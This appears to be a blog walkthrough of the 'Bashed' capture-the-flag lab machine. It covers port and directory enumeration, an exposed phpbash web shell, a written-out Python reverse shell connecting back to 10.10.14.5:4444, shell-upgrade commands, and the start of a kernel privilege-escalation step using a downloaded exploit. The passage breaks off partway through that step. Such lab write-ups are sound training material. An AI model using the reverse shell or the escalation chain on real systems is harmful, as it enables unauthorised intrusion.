Contents
Bashed is a fairly straightforward box. Let’s start the walkthrough with basic enumeration!
nmap -sC -sV -oA bashed 10.10.10.68
Only port 80 is open. The next steps to take, navigate to the webpage and have dirbuster running in order to enumerate any web pages.
[hr]
Looks like they’re implementing a phpbash server and it’s safe to assume from the landing pages text that they’re running an instance of phpbash on this server. If we can find it, we will have our way in. While looking at the landing page, we also had Dirb running in the background with the default Dirb folder/file list (/usr/share/dirb/wordlists/common.txt).
Alright, there’s a /dev/ page and when we navigate to it, we find the phpbash instance link at http://10.10.10.68/dev/phpbash.php.
[hr]
First, we enumerate the basics we have access to. We’re just checking for low hanging fruit right off the bat. We find we are www-data, makes sense since it was web-based implementation. We look at the /etc/passwd, /etc/shadow permissions, check for cron jobs, and enumerate any users.
[hr]
We’ve got some basic information on the box but, let’s get a shell to do more in-depth digging. Since we have a literal BASH session, let’s just use one of the many different methods to pop a reverse shell. I’m going to reference the Reverse Shell Cheat Sheet by Pentestmonkey. I’ve decided to run with the Python reverse shell:
[sourcecode language=”python” wraplines=”false” collapse=”false”]
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
[/sourcecode]
We start a Netcat listener on the Kali box and run the Python reverse shell command on the PHP Bash instance.
Let’s clean this shell up a bit and add tab autocompletion with the following commands:
[sourcecode language=”bash” wraplines=”false” collapse=”false”]
# Check the Python Version to check if Python exists
which python
# Gives us a full Pseudo-Terminal
python -c ‘import pty; pty.spawn("/bin/bash");’
[/sourcecode]
We have a pseudo terminal but, no auto-completion. In order to get auto-completion, we need to put in a bit more work. Below is the simple processes to get shell auto-completion.
[sourcecode language=”bash” wraplines=”false” collapse=”false”]
# Background the current shell with ctrl-z
stty raw -echo
fg
[/sourcecode]
[hr]
We’ve already looked at the passwd and shadow permissions, enumerated cron jobs, and finally found all users by looking at the home directory. Another thing we should always do, check for sudo permissions (sudo -l). In this case though, I know that user scriptmanager has sudo rights but, it’s not the path of least resistance.
In out enumeration, we should always check for out of date kernels by running uname -r or uname -a. in our case, we’re working with:
[box style=”rounded” border=”full”]Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux[/box]
[hr]
Googleing “Linux 4.4.0 exploits” brings up the following results:
Looking at the first like, it’s a DCCP exploit. DCCP is a Datagram Congestion Control Protocol (UDP). It’s an obscure and vulnerable protocol that we can take advantage of by essentially crashing the kernel and escalating our privileges to root.
First, get the raw code from ExploitDB and compiling it on your kali machine (gcc <program.c> -o pwn).
Second, start an HTTP server in order to download the binary to Bashed.
[sourcecode language=”python” wraplines=”false” collapse=”false”]
python -m SimpleHTTPServer 1234
[/sourcecode]
Third, wget the binary, change permissions, and execute.